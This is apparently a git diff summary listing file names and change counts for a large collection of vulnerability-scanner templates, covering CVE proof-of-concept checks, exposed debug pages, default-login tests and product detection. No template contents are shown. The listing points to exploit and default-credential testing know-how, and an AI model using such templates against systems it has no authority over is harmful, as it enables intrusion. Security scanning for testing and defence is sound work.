poc/cve/cve-2022-1713(1).yaml | 37 + poc/cve/cve-2022-1724(1).yaml | 34 + poc/cve/cve-2022-1946(1).yaml | 36 + poc/cve/cve-2022-21500(1).yaml | 37 + poc/cve/cve-2022-2187(1).yaml | 36 - poc/cve/cve-2022-22536-6662.yaml | 56 - poc/cve/cve-2022-22963.yaml | 36 - poc/cve/cve-2022-22972(1).yaml | 93 - poc/cve/cve-2022-24129(1).yaml | 31 - poc/cve/cve-2022-24681(1).yaml | 43 + poc/cve/cve-2022-24856(1).yaml | 30 + poc/cve/cve-2022-2486(1).yaml | 34 + poc/cve/cve-2022-2487(1).yaml | 42 + poc/cve/cve-2022-2488(1).yaml | 34 - poc/cve/cve-2022-26135(1).yaml | 28 - poc/cve/cve-2022-26233-6735.yaml | 32 + poc/cve/cve-2022-26564(1).yaml | 41 - poc/cve/cve-2022-26960(1).yaml | 36 + poc/cve/cve-2022-28079(1).yaml | 38 - poc/cve/cve-2022-28080(1).yaml | 65 - poc/cve/cve-2022-29301(1).yaml | 37 + poc/cve/cve-2022-29383(1).yaml | 42 - poc/cve/cve-2022-29455(1).yaml | 47 + poc/cve/cve-2022-29455.yaml | 36 + poc/cve/cve-2022-29464(1).yaml | 44 - poc/cve/cve-2022-30073(1).yaml | 63 + poc/cve/cve-2022-30489(1).yaml | 42 + poc/cve/cve-2022-30525(1).yaml | 39 + poc/cve/cve-2022-30776(1).yaml | 38 + poc/cve/cve-2022-30777(1).yaml | 38 - poc/cve/cve-2022-31268(1).yaml | 40 - poc/cve/cve-2022-32025(1).yaml | 46 + poc/cve/cve-2022-32026(1).yaml | 47 + poc/cve/cve-2022-34046(1).yaml | 34 - poc/cve/cve-2022-34047(1).yaml | 34 + poc/cve/cve-2022-34049(1).yaml | 41 - poc/cve/cve-2022-35416(1).yaml | 39 + poc/cve/cve-2022-36883(1).yaml | 27 - poc/cve/cve-2022-42889.yaml | 65 + poc/cve/cve-2024-23897.yaml | 56 - ...021-41773.yaml => rce-cve-2021-41773.yaml} | 0 poc/cve/resin-cnnvd-200705-315-9865.yaml | 23 + poc/cve/resin-cnnvd-200705-315-9866.yaml | 26 - .../android-debug-database-exposed-314.yaml | 24 + .../android-debug-database-exposed-315.yaml | 4 +- poc/debug/aspx-debug-mode-575.yaml | 31 - poc/debug/aspx-debug-mode-579.yaml | 62 +- poc/debug/aspx-debug-mode.yaml | 31 + poc/debug/browserless-debugger-794.yaml | 33 - poc/debug/coldfusion-debug-xss-1152.yaml | 61 +- ...ss.yaml => coldfusion-debug-xss-1153.yaml} | 0 poc/debug/debug-enabled-6788.yaml | 16 - poc/debug/debug-enabled.yaml | 7 +- poc/debug/django-debug-detect-7026.yaml | 21 - poc/debug/django-debug-exposure-csrf.yaml | 17 +- .../{django-debug.yml => django-debug.yaml} | 0 poc/debug/jboss-seam-debug-page-8239.yaml | 21 - poc/debug/jboss-seam-debug-page-8240.yaml | 22 + poc/debug/jboss-seam-debug-page.yaml | 13 +- poc/debug/laravel-debug-enabled-8574.yaml | 6 +- poc/debug/laravel-debug-enabled-8576.yaml | 6 +- poc/debug/php-debug-bar-9506.yaml | 6 +- poc/debug/php-debug-bar-9507.yaml | 30 + poc/debug/pyramid-debug-toolbar-9741.yaml | 10 +- poc/debug/rails-debug-mode.yaml | 11 +- poc/debug/symfony-debugmode-10618.yaml | 24 - poc/debug/symfony-debugmode-10620.yaml | 7 +- ...103.yaml => wamp-xdebug-detect-11100.yaml} | 0 poc/debug/wamp-xdebug-detect-11101.yaml | 3 +- poc/debug/werkzeug-debugger-detect-11196.yaml | 15 + poc/debug/werkzeug-debugger-detect-11197.yaml | 14 - ...58.yaml => wordpress-debug-log-11259.yaml} | 0 poc/debug/yii-debugger-11738.yaml | 33 + poc/debug/yii-debugger-11739.yaml | 5 +- poc/debug/yii-debugger-11741.yaml | 37 - poc/default/JeeSite-default-login.yaml | 5 +- poc/default/activemq-default-login-47.yaml | 34 +- ...in-44.yaml => activemq-default-login.yaml} | 0 poc/default/aem-default-get-servlet-135.yaml | 91 - poc/default/aem-default-get-servlet-137.yaml | 78 + poc/default/aem-default-get-servlet.yaml | 14 +- poc/default/aem-default-login-140.yaml | 56 + poc/default/aem-default-login-142.yaml | 21 +- poc/default/airflow-default-login-236.yaml | 21 +- poc/default/alphaweb-default-login-275.yaml | 45 + poc/default/alphaweb-default-login-277.yaml | 14 +- poc/default/ambari-default-login-287.yaml | 35 + poc/default/ambari-default-login-289.yaml | 7 +- poc/default/ambari-default-login-290.yaml | 11 +- poc/default/apisix-default-login-490.yaml | 13 +- poc/default/apisix-default-login-491.yaml | 51 + poc/default/apollo-default-login-520.yaml | 4 +- poc/default/arl-default-password.yaml | 4 + poc/default/azkaban-default-login-674.yaml | 47 + poc/default/azkaban-default-login.yaml | 53 - ...sinessintelligence-default-login-814.yaml} | 0 .../businessintelligence-default-login.yaml | 55 - poc/default/canal-default-login-848.yaml | 2 +- .../chinaunicom-default-login-908.yaml | 6 +- .../chinaunicom-default-login-909.yaml | 33 + poc/default/cobbler-default-login.yaml | 59 + poc/default/cs141-default-login-1277.yaml | 55 - poc/default/cs141-default-login-1278.yaml | 44 + poc/default/cs141-default-login-1279.yaml | 9 +- poc/default/default-apache-test-all-6813.yaml | 29 + poc/default/default-apache-test-all-6814.yaml | 10 +- ...6815.yaml => default-apache-test-all.yaml} | 0 .../default-apache-test-page-6818.yaml | 5 +- poc/default/default-apache-test-page.yaml | 17 + .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/default/default-apache2-ubuntu-page.yaml | 17 + poc/default/default-asp-net-page-6824.yaml | 5 +- poc/default/default-asp-net-page-6825.yaml | 8 +- .../default-centos-test-page-6827.yaml | 10 +- poc/default/default-centos-test-page.yaml | 17 - .../default-codeigniter-page-6831.yaml | 8 +- .../default-codeigniter-page-6833.yaml | 27 - poc/default/default-django-page-6841.yaml | 6 +- ...age-6840.yaml => default-django-page.yaml} | 0 poc/default/default-fastcgi-page-6844.yaml | 5 +- poc/default/default-fastcgi-page.yaml | 17 + ...age.yaml => default-fedora-page-6848.yaml} | 0 poc/default/default-fedora-page-6849.yaml | 10 +- .../default-glassfish-server-page-6852.yaml | 17 - poc/default/default-iis7-page-6858.yaml | 17 - poc/default/default-iis7-page-6860.yaml | 3 +- poc/default/default-jetty-page-6862.yaml | 9 +- poc/default/default-jetty-page-6864.yaml | 6 +- poc/default/default-lighttpd-page-6867.yaml | 3 - poc/default/default-lucee-page-6868.yaml | 5 +- poc/default/default-lucee-page-6870.yaml | 26 + poc/default/default-lucee-page-6871.yaml | 24 + .../default-microsoft-azure-page-6873.yaml | 5 +- poc/default/default-microsoft-azure-page.yaml | 17 - poc/default/default-movable-page-6878.yaml | 6 +- poc/default/default-movable-page-6879.yaml | 10 +- poc/default/default-nginx-page-6880.yaml | 18 + poc/default/default-nginx-page.yaml | 5 +- poc/default/default-openresty-6885.yaml | 5 +- poc/default/default-openresty-6886.yaml | 6 +- .../default-oracle-application-page-6892.yaml | 3 +- .../default-oracle-application-page.yaml | 18 - ...l => default-payara-server-page-6894.yaml} | 0 .../default-payara-server-page-6896.yaml | 5 +- poc/default/default-plesk-page-6899.yaml | 19 - poc/default/default-plesk-page-6900.yaml | 7 +- .../default-redhat-test-page-6902.yaml | 9 +- poc/default/default-redhat-test-page.yaml | 17 + .../default-ssltls-test-page-6908.yaml | 23 + .../default-windows-server-page-6913.yaml | 6 +- poc/default/default-windows-server-page.yaml | 17 + .../dell-idrac-default-login-6943.yaml | 9 +- .../dell-idrac-default-login-6945.yaml | 32 +- .../dell-idrac-default-login-6946.yaml | 24 - .../dell-idrac9-default-login-6932.yaml | 37 - .../dell-idrac9-default-login-6933.yaml | 36 +- .../dolphinscheduler-default-login-7072.yaml | 10 +- .../dolphinscheduler-default-login-7073.yaml | 42 - .../dubbo-admin-default-login-7120.yaml | 48 + poc/default/dubbo-admin-default-login.yaml | 41 - poc/default/dvwa-default-login-7127.yaml | 2 +- poc/default/dvwa-default-login-7129.yaml | 18 +- .../exacqvision-default-login-7274.yaml | 8 +- .../exacqvision-default-login-7277.yaml | 51 + poc/default/flir-default-login-7516.yaml | 2 +- poc/default/flir-default-login.yaml | 42 + poc/default/frp-default-login-7557.yaml | 21 +- ...login.yaml => frp-default-login-7559.yaml} | 0 poc/default/ftp-default-credentials.yaml | 55 +- poc/default/ftp-default-creds.yaml | 30 - ...n.yaml => fuelcms-default-login-7571.yaml} | 0 poc/default/fuelcms-default-login-7572.yaml | 48 - poc/default/geoserver-default-login-7593.yaml | 10 +- poc/default/geoserver-default-login-7594.yaml | 41 + poc/default/geoserver-default-login.yaml | 42 + poc/default/gophish-default-login-7792.yaml | 14 +- poc/default/gophish-default-login.yaml | 50 - poc/default/grafana-default-login-7801.yaml | 24 +- poc/default/grafana-default-login-7804.yaml | 55 + poc/default/guacamole-default-login-7858.yaml | 16 +- poc/default/guacamole-default-login-7859.yaml | 38 - poc/default/guacamole-default-login-7861.yaml | 12 +- poc/default/hongdian-default-login-7997.yaml | 10 +- poc/default/hongdian-default-login-7998.yaml | 10 - poc/default/hp-switch-default-login.yaml | 29 - .../huawei-HG532e-default-router-login.yaml | 8 - ...awei-hg532e-default-router-login-8064.yaml | 30 - poc/default/hue-default-credential-8080.yaml | 23 +- poc/default/hue-default-credential-8081.yaml | 8 +- .../ibm-mqseries-default-login-8106.yaml | 51 + .../ibm-mqseries-default-login-8107.yaml | 39 - .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- ...spur-clusterengine-default-login-8162.yaml | 14 +- .../inspur-clusterengine-default-login.yaml | 39 + poc/default/iptime-default-login-8193.yaml | 42 - poc/default/jenkins-default-8271.yaml | 35 - poc/default/jinher-oa-default-login-8311.yaml | 10 +- poc/default/jinher-oa-default-login-8312.yaml | 52 - poc/default/jmx-default-login-8355.yaml | 38 - poc/default/jmx-default-login.yaml | 42 + .../kafka-center-default-login-8416.yaml | 42 + .../kafka-center-default-login-8417.yaml | 13 +- poc/default/lighttpd-default-8627.yaml | 19 - .../mantisbt-default-credential-8778.yaml | 9 +- .../mantisbt-default-credential-8779.yaml | 41 - ...micro-focus-ucmdb-default-credentials.yaml | 2 - poc/default/minio-default-login-8888.yaml | 35 - poc/default/minio-default-login-8889.yaml | 9 - poc/default/minio-default-password.yaml | 6 - poc/default/nagios-default-login-8991.yaml | 39 - poc/default/nagios-default-login.yaml | 31 + poc/default/nps-default-login-9144.yaml | 13 +- poc/default/nps-default-login-9145.yaml | 19 +- poc/default/nps-default-password.yaml | 19 +- .../octobercms-default-login-9192.yaml | 59 + ...193.yaml => octobercms-default-login.yaml} | 0 ...erations-automation-default-page-9337.yaml | 24 - ...erations-automation-default-page-9339.yaml | 12 +- poc/default/panabit-default-login-9438.yaml | 44 + ...n-9440.yaml => panabit-default-login.yaml} | 0 .../panabit-ixcache-default-login-9443.yaml | 14 +- .../panabit-ixcache-default-login.yaml | 30 - poc/default/pentaho-default-login-9478.yaml | 10 + poc/default/pentaho-default-login.yaml | 43 - poc/default/rabbitmq-default-admin-9782.yaml | 4 +- poc/default/rabbitmq-default-login-9786.yaml | 32 - poc/default/rabbitmq-default-login.yaml | 36 - poc/default/rainloop-default-login-9813.yaml | 49 - poc/default/rainloop-default-login.yaml | 11 +- poc/default/rancher-default-login-9814.yaml | 11 +- ...n-9815.yaml => rancher-default-login.yaml} | 0 poc/default/ranger-default-login-9827.yaml | 48 - ...in-9828.yaml => ranger-default-login.yaml} | 0 .../rockmongo-default-credentials.yaml | 5 + poc/default/rockmongo-default-login-9899.yaml | 15 +- poc/default/rockmongo-default-login.yaml | 41 - poc/default/rseenet-default-login-9913.yaml | 44 + poc/default/rseenet-default-login-9914.yaml | 6 +- .../samsung-wlan-default-login-10015.yaml | 9 +- .../samsung-wlan-default-login-10017.yaml | 3 +- .../secnet-ac-default-login-10113.yaml | 12 +- poc/default/secnet-ac-default-login.yaml | 36 + poc/default/seeddms-default-login-10127.yaml | 20 +- poc/default/seeddms-default-login-10128.yaml | 23 +- .../sequoiadb-default-login-10150.yaml | 9 +- .../sequoiadb-default-login-10151.yaml | 37 - .../sequoiadb-default-login-10152.yaml | 45 + poc/default/showdoc-default-login-10221.yaml | 3 +- poc/default/showdoc-default-login-10222.yaml | 16 +- .../smartsense-default-login-10330.yaml | 6 +- .../smartsense-default-login-10331.yaml | 21 +- .../solarwinds-default-login-10354.yaml | 54 + .../solarwinds-default-login-10355.yaml | 3 +- .../spectracom-default-login-10403.yaml | 9 +- .../spectracom-default-login-10405.yaml | 3 +- .../stackstorm-default-login-10530.yaml | 41 + poc/default/stackstorm-default-login.yaml | 4 +- .../supermicro-default-login-10572.yaml | 11 +- poc/default/supermicro-default-login.yaml | 36 - poc/default/superset-default-login-10574.yaml | 60 +- poc/default/superset-default-login.yaml | 8 + poc/default/szhe-default-login-10638.yaml | 49 - poc/default/szhe-default-login.yaml | 41 + .../telecom-gateway-default-login-10686.yaml | 14 +- .../telecom-gateway-default-login.yaml | 33 + poc/default/tomcat-default-login-10789.yaml | 103 +- poc/default/tomcat-default-login-10790.yaml | 2 +- .../trilithic-viewpoint-default-10835.yaml | 18 +- poc/default/ucmdb-default-login-10871.yaml | 35 + poc/default/ucmdb-default-login.yaml | 41 - poc/default/versa-default-login-11004.yaml | 29 +- poc/default/versa-default-login.yaml | 49 - poc/default/vidyo-default-login-11010.yaml | 11 +- .../visionhub-default-login-11026.yaml | 42 + ...1029.yaml => visionhub-default-login.yaml} | 0 poc/default/wifisky-default-login-11201.yaml | 55 + poc/default/wifisky-default-login.yaml | 48 + poc/default/wso2-default-login-11640.yaml | 10 +- ...gin-11641.yaml => wso2-default-login.yaml} | 0 poc/default/xampp-default-page-11661.yaml | 7 +- poc/default/xampp-default-page-11663.yaml | 19 - poc/default/xampp-default-page.yaml | 20 - poc/default/xxljob-default-login-11709.yaml | 11 +- poc/default/xxljob-default-login-11713.yaml | 22 +- ...2.yaml => zabbix-default-login-11763.yaml} | 0 poc/default/zmanda-default-login-11826.yaml | 39 + poc/default/zmanda-default-login.yaml | 31 - poc/detect/Biometric-detect.yaml | 31 +- poc/detect/acontent-detect-32.yaml | 31 + ...nt-detect.yaml => acontent-detect-33.yaml} | 0 poc/detect/addeventlistener-detect-65.yaml | 20 + poc/detect/addeventlistener-detect-66.yaml | 19 - poc/detect/addeventlistener-detect.yaml | 30 +- poc/detect/adobe-coldfusion-detect-82.yaml | 68 - poc/detect/adobe-coldfusion-detect.yaml | 62 + .../adobe-coldfusion-error-detect-86.yaml | 7 +- ... => adobe-coldfusion-error-detect-88.yaml} | 0 poc/detect/aem-detection-144.yaml | 28 + poc/detect/aem-detection-145.yaml | 28 - poc/detect/aem-detection.yaml | 16 +- poc/detect/airflow-detect-239.yaml | 24 + ...ow-detect-240.yaml => airflow-detect.yaml} | 0 poc/detect/alfresco-detect-258.yaml | 43 - poc/detect/alfresco-detect-259.yaml | 7 + poc/detect/alfresco-detect-260.yaml | 33 + poc/detect/apache-detect-348.yaml | 30 - poc/detect/apollo-server-detect-523.yaml | 37 + ...ect-522.yaml => apollo-server-detect.yaml} | 0 poc/detect/argocd-detect.yaml | 28 +- poc/detect/artica-web-proxy-detect-543.yaml | 18 + poc/detect/artica-web-proxy-detect-544.yaml | 12 +- poc/detect/autobahn-python-detect-594.yaml | 30 + poc/detect/autobahn-python-detect-595.yaml | 8 +- poc/detect/avantfax-detect-598.yaml | 31 - poc/detect/avantfax-detect.yaml | 20 +- poc/detect/aws-elastic-beanstalk-detect.yaml | 3 +- poc/detect/azure-takeover-detection-681.yaml | 40 - poc/detect/azure-takeover-detection-683.yaml | 29 +- poc/detect/basic-auth-detection-688.yaml | 45 +- poc/detect/bedita-detect-704.yaml | 25 - poc/detect/bedita-detect.yaml | 50 +- poc/detect/bigbluebutton-detect-723.yaml | 28 + poc/detect/bigbluebutton-detect.yaml | 25 - .../bigip-config-utility-detect-730.yaml | 12 +- .../bigip-config-utility-detect-731.yaml | 34 + .../bigip-config-utility-detect-733.yaml | 34 + poc/detect/brother-printer-detect-790.yaml | 31 - poc/detect/brother-printer-detect.yaml | 58 +- poc/detect/burp-api-detect-810.yaml | 34 + poc/detect/burp-api-detect.yaml | 28 - poc/detect/carestream-vue-detect-859.yaml | 14 +- poc/detect/carestream-vue-detect-860.yaml | 59 +- poc/detect/carestream-vue-detect-861.yaml | 30 - poc/detect/centreon-detect-875.yaml | 48 +- poc/detect/centreon-detect-877.yaml | 24 - poc/detect/chevereto-detect-905.yaml | 35 - poc/detect/chevereto-detect.yaml | 32 + poc/detect/citrix-adc-gateway-detect-983.yaml | 27 - poc/detect/citrix-vpn-detect-984.yaml | 26 - poc/detect/cockpit-detect-1125.yaml | 1 + poc/detect/cockpit-detect-1126.yaml | 16 - poc/detect/craft-cms-detect-1247.yaml | 11 +- poc/detect/craft-cms-detect-1248.yaml | 28 - .../custom-data-result-service-detect.yaml | 20 - .../custom-datadump-source-code-detect.yaml | 3 +- poc/detect/dell-idrac6-detect-6918.yaml | 29 - poc/detect/dell-idrac6-detect-6919.yaml | 8 +- poc/detect/dell-idrac6-detect.yaml | 25 - poc/detect/dell-idrac7-detect-6922.yaml | 25 + poc/detect/dell-idrac7-detect-6924.yaml | 6 +- poc/detect/dell-idrac8-detect-6927.yaml | 29 + poc/detect/dell-idrac8-detect-6928.yaml | 2 +- poc/detect/dell-idrac8-detect.yaml | 25 + poc/detect/dell-idrac9-detect-6936.yaml | 5 +- poc/detect/dell-idrac9-detect-6938.yaml | 35 - poc/detect/dell-idrac9-detect-6939.yaml | 30 - .../detect-addpac-voip-gateway-6965.yaml | 39 + poc/detect/detect-all-takeover.yaml | 570 +- poc/detect/detect-dangling-cname-6966.yaml | 34 + poc/detect/detect-dangling-cname-6967.yaml | 14 +- poc/detect/detect-drone-config-6972.yaml | 11 +- poc/detect/detect-jabber-xmpp-6974.yaml | 7 +- poc/detect/detect-jabber-xmpp-6975.yaml | 7 +- poc/detect/detect-options-method-6977.yaml | 19 - poc/detect/detect-options-method-6978.yaml | 5 +- poc/detect/detect-rsyncd-6980.yaml | 8 +- poc/detect/detect-rsyncd-6982.yaml | 24 + poc/detect/detect-sentry-6984.yaml | 21 + ...ct-sentry-6983.yaml => detect-sentry.yaml} | 0 poc/detect/django-debug-detect-7026.yaml | 21 - poc/detect/dns-waf-detect.yaml | 38 +- poc/detect/dolibarr-detect-7069.yaml | 25 - poc/detect/dwr-index-detect-7134.yaml | 31 - poc/detect/dwr-index-detect-7135.yaml | 10 +- poc/detect/ec2-detection-7161.yaml | 15 +- poc/detect/ec2-detection-7162.yaml | 18 - poc/detect/eg-manager-detect-7183.yaml | 25 + poc/detect/eg-manager-detect-7184.yaml | 7 +- poc/detect/eg-manager-detect.yaml | 20 - .../elasticsearch-sql-client-detect-7190.yaml | 23 + .../elasticsearch-sql-client-detect.yaml | 21 + poc/detect/elfinder-detect-7201.yaml | 12 +- poc/detect/elfinder-detect-7202.yaml | 15 +- poc/detect/epson-projector-detect.yaml | 13 +- poc/detect/epson-web-control-detect.yaml | 5 +- poc/detect/esmtp-detect.yaml | 35 + poc/detect/exim-detect.yaml | 39 + poc/detect/expn-mail-detect.yaml | 13 +- ...detect.yaml => fanruanoa-detect-7391.yaml} | 0 poc/detect/fanruanoa-detect-7392.yaml | 11 +- poc/detect/fatpipe-mpvpn-detect-7437.yaml | 31 - poc/detect/fatpipe-mpvpn-detect.yaml | 13 +- poc/detect/fatpipe-warp-detect-7439.yaml | 31 + poc/detect/fatpipe-warp-detect.yaml | 13 +- poc/detect/favicon-detection-7443.yaml | 2637 + poc/detect/firebase-detect-7493.yaml | 20 - poc/detect/froxlor-detect-7552.yaml | 24 - ...r-detect-7553.yaml => froxlor-detect.yaml} | 0 poc/detect/getsimple-cms-detect-7614.yaml | 11 +- poc/detect/getsimple-cms-detect-7615.yaml | 9 +- poc/detect/getsimple-cms-detector-7613.yaml | 22 - poc/detect/getsimple-cms-detector.yaml | 44 +- poc/detect/gitbook-detect.yaml | 2 +- poc/detect/github-enterprise-detect-7649.yaml | 19 - poc/detect/gitlab-detect-7670.yaml | 18 +- poc/detect/gradle-cache-node-detect-7798.yaml | 21 + poc/detect/grafana-detect-7807.yaml | 23 - poc/detect/graphql-detect-7831.yaml | 158 - poc/detect/graphql-detect-7832.yaml | 159 +- poc/detect/grav-cms-detect-7843.yaml | 31 + ...-detect.yaml => grav-cms-detect-7844.yaml} | 0 poc/detect/hanwang-detect-7881.yaml | 14 +- poc/detect/hanwang-detect-7882.yaml | 8 +- poc/detect/harbor-detect-7886.yaml | 29 +- poc/detect/harbor-detect.yaml | 19 - ...t-7937.yaml => herokuapp-detect-7939.yaml} | 0 poc/detect/herokuapp-detect.yaml | 42 +- poc/detect/hikvision-detection-7955.yaml | 6 - poc/detect/hp-blade-admin-detect-8004.yaml | 32 - poc/detect/hp-device-info-detect-8009.yaml | 3 +- poc/detect/hp-device-info-detect.yaml | 12 +- poc/detect/hp-laserjet-detect-8027.yaml | 3 +- poc/detect/hp-laserjet-detect.yaml | 22 + poc/detect/htpasswd-detection-8046.yaml | 25 - poc/detect/ilo-detect-8154.yaml | 36 - .../{ilo-detect.yaml => ilo-detect-8155.yaml} | 0 poc/detect/influxdb-detect-8159.yaml | 34 + poc/detect/iplanet-imap-detect.yaml | 21 +- poc/detect/itop-detect-8201.yaml | 48 +- poc/detect/itop-detect-8203.yaml | 24 - poc/detect/jaspersoft-detect-8219.yaml | 1 - poc/detect/java-rmi-detect-8227.yaml | 17 +- poc/detect/jeecg-boot-detect-8247.yaml | 9 +- poc/detect/jeecg-boot-detect.yaml | 21 - poc/detect/jeedom-detect-8251.yaml | 5 + poc/detect/jellyfin-detect-8256.yaml | 8 + poc/detect/jellyfin-detect.yaml | 31 - poc/detect/jira-detect-8314.yaml | 41 + poc/detect/kevinlab-device-detect-8461.yaml | 2 +- poc/detect/kevinlab-device-detect.yaml | 26 + poc/detect/kong-detect-8499.yaml | 4 +- poc/detect/leostream-detection.yaml | 17 +- poc/detect/leostream-detection.yml | 17 - ...3.yaml => liferay-portal-detect-8626.yaml} | 0 poc/detect/linkerd-detect-8632.yaml | 10 +- poc/detect/linkerd-detect-8633.yaml | 13 +- poc/detect/linkerd-service-detect-8634.yaml | 18 +- poc/detect/lucee-detect-8659.yaml | 23 + poc/detect/magento-detect-8706.yaml | 8 +- poc/detect/magento-detect-8707.yaml | 6 +- ...gmi-detect.yaml => magmi-detect-8714.yaml} | 0 poc/detect/magmi-detect-8716.yaml | 11 +- poc/detect/maian-cart-detect-8719.yaml | 21 + poc/detect/maian-cart-detect.yaml | 14 - poc/detect/mantis-detect-8780.yaml | 15 + poc/detect/mantis-detect-8782.yaml | 18 - poc/detect/mantis-detect.yaml | 3 + poc/detect/metabase-detect-8804.yaml | 35 + poc/detect/metabase-detect.yaml | 21 +- ...microsoft-exchange-server-detect-8853.yaml | 33 + poc/detect/microweber-detect-8862.yaml | 26 - poc/detect/microweber-detect-8863.yaml | 5 +- poc/detect/minio-console-detect-8884.yaml | 24 + poc/detect/minio-console-detect.yaml | 18 +- poc/detect/minio-detect-8892.yaml | 21 - poc/detect/minio-detect-8894.yaml | 46 +- poc/detect/minio-detect.yaml | 15 +- poc/detect/moinmoin-detect-8916.yaml | 30 + poc/detect/moinmoin-detect.yaml | 2 +- poc/detect/mrtg-detect-8959.yaml | 17 +- poc/detect/ms-adcs-detect-8960.yaml | 24 - poc/detect/ms-adcs-detect-8961.yaml | 29 + poc/detect/ms-adcs-detect.yaml | 7 +- poc/detect/mx-service-detector-8975.yaml | 8 +- poc/detect/mx-service-detector.yaml | 71 - poc/detect/neos-detect-9013.yaml | 17 +- poc/detect/neos-detect-9014.yaml | 9 +- poc/detect/netdata-dashboard-detected.yaml | 18 +- .../netsweeper-webadmin-detect-9068.yaml | 38 - ...detect.yaml => nextcloud-detect-9081.yaml} | 0 poc/detect/nexus-detect-9095.yaml | 30 - ...xus-detect-9093.yaml => nexus-detect.yaml} | 0 poc/detect/node-red-detect-9139.yaml | 32 + poc/detect/node-red-detect.yaml | 19 - poc/detect/oauth2-detect-9181.yaml | 28 + poc/detect/oauth2-detect-9182.yaml | 51 +- poc/detect/oauth2-detect-9183.yaml | 8 +- poc/detect/octobercms-detect-9196.yaml | 3 +- poc/detect/oipm-detect-9221.yaml | 22 + poc/detect/oipm-detect-9222.yaml | 14 - poc/detect/oneblog-detect.yaml | 21 - ...en-virtualization-manager-detect-9326.yaml | 37 + .../open-virtualization-manager-detect.yaml | 16 +- poc/detect/openam-detection-9257.yaml | 54 +- poc/detect/opencast-detect-9263.yaml | 17 +- poc/detect/opencast-detect-9265.yaml | 10 +- poc/detect/openemr-detect-9273.yaml | 22 - poc/detect/openemr-detect-9274.yaml | 25 + poc/detect/openemr-detect.yaml | 18 +- poc/detect/opensis-detect-9313.yaml | 36 + poc/detect/oracle-dbass-detect-9350.yaml | 7 +- poc/detect/oracle-dbass-detect-9351.yaml | 21 + poc/detect/pega-detect-9474.yaml | 3 +- poc/detect/pega-detect-9475.yaml | 11 +- poc/detect/php-proxy-detect-9545.yaml | 26 - poc/detect/php-proxy-detect.yaml | 26 + poc/detect/phpcollab-detect-9499.yaml | 21 + poc/detect/phpcollab-detect-9501.yaml | 25 - poc/detect/phpcollab-detect.yaml | 4 + poc/detect/pi-hole-detect-9583.yaml | 5 - poc/detect/prtg-detect-9703.yaml | 8 +- poc/detect/prtg-detect-9706.yaml | 32 - ...ct-9718.yaml => puppetdb-detect-9719.yaml} | 0 poc/detect/puppetdb-detect.yaml | 26 + poc/detect/puppetserver-detect-9723.yaml | 3 +- poc/detect/puppetserver-detect.yaml | 31 - poc/detect/rdp-detect-9840.yaml | 67 - poc/detect/rdp-detect.yaml | 55 + poc/detect/redcap-detector-9849.yaml | 5 + poc/detect/redmine-cli-detect-9854.yaml | 10 +- poc/detect/redmine-cli-detect-9855.yaml | 12 +- poc/detect/remkon-manager-detect.yaml | 4 + poc/detect/rhymix-cms-detect-9878.yaml | 22 - ...etect.yaml => rhymix-cms-detect-9879.yaml} | 0 poc/detect/rstudio-detect.yaml | 15 +- poc/detect/s3-detect-9963.yaml | 2 + poc/detect/s3-detect-9965.yaml | 17 - poc/detect/samba-detect-9990.yaml | 10 +- poc/detect/samsung-printer-detect.yaml | 22 +- poc/detect/sap-igs-detect-10039.yaml | 15 +- poc/detect/sap-igs-detect-10040.yaml | 17 +- poc/detect/sap-netweaver-detect-10044.yaml | 2 +- poc/detect/sap-netweaver-detect-10047.yaml | 26 - poc/detect/sap-recon-detect-10062.yaml | 29 + poc/detect/sap-recon-detect-10063.yaml | 30 - poc/detect/sceditor-detect-10094.yaml | 3 + poc/detect/secmail-detect-10111.yaml | 4 +- poc/detect/secmail-detect-10112.yaml | 21 - poc/detect/shiro-detect-10195.yaml | 18 +- ...ro-detect.yaml => shiro-detect-10196.yaml} | 0 poc/detect/shopware-detect-10211.yaml | 28 + poc/detect/shopware-detect-10213.yaml | 13 +- poc/detect/shopware-detect.yaml | 24 + poc/detect/smartstore-detect-10333.yaml | 29 - poc/detect/smartstore-detect-10334.yaml | 10 +- poc/detect/smb-v1-detection-10336.yaml | 3 +- .../solarwinds-servuftp-detect-10360.yaml | 5 - poc/detect/solarwinds-servuftp-detect.yaml | 15 +- ...sonicwall-email-security-detect-10384.yaml | 29 + .../sonicwall-email-security-detect.yaml | 17 - .../sophos-fw-version-detect-10397.yaml | 39 +- poc/detect/strapi-cms-detect-10539.yaml | 3 +- poc/detect/strapi-cms-detect.yaml | 31 - poc/detect/tech-detect-10673.yaml | 144 +- poc/detect/tech-detect-10674.yaml | 3129 - poc/detect/tech-detect-10676.yaml | 447 +- .../telerik-dialoghandler-detect-10691.yaml | 17 +- .../telerik-fileupload-detect-10693.yaml | 14 +- .../telerik-fileupload-detect-10695.yaml | 13 - poc/detect/terraform-detect-10707.yaml | 2 +- poc/detect/terraform-detect-10709.yaml | 4 +- poc/detect/tomcat-detect-10793.yaml | 4 +- poc/detect/totemomail-detect.yaml | 4 + poc/detect/totemomail-smtp-detect.yaml | 26 + poc/detect/trace-axd-detect-10825.yaml | 3 +- poc/detect/trace-axd-detect.yaml | 13 +- ...zed-puppet-node-manager-detect-10959.yaml} | 0 ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/detect/virtual-ema-detect-11024.yaml | 18 + poc/detect/virtual-ema-detect-11025.yaml | 18 - poc/detect/virtual-ema-detect.yaml | 16 +- poc/detect/vmware-version-detect-11054.yaml | 63 - poc/detect/vmware-version-detect.yaml | 23 +- ...yaml => vmware-vrealize-detect-11058.yaml} | 0 poc/detect/vmware-vrealize-detect.yaml | 30 + poc/detect/voipmonitor-detect.yaml | 6 +- poc/detect/vsftpd-detection-11074.yaml | 3 +- poc/detect/vsftpd-detection-11076.yaml | 17 - poc/detect/vsftpd-detection.yaml | 6 +- poc/detect/waf-detect-11086.yaml | 277 +- poc/detect/waf-detect-11089.yaml | 751 - ...103.yaml => wamp-xdebug-detect-11100.yaml} | 0 poc/detect/wamp-xdebug-detect-11101.yaml | 3 +- poc/detect/wazuh-detect-11111.yaml | 22 + .../weave-scope-dashboard-detect-11118.yaml | 17 - poc/detect/web-ftp-detect-11137.yaml | 43 +- poc/detect/web-ftp-detect-11138.yaml | 5 +- .../werkzeug-debugger-detect-11196.yaml | 15 + .../werkzeug-debugger-detect-11197.yaml | 14 - poc/detect/whm-login-detect.yaml | 22 +- poc/detect/wondercms-detect-11223.yaml | 21 + ...etect-11222.yaml => wondercms-detect.yaml} | 0 poc/detect/wordpress-detect-11261.yaml | 2 +- poc/detect/wordpress-plugins-detect.yaml | 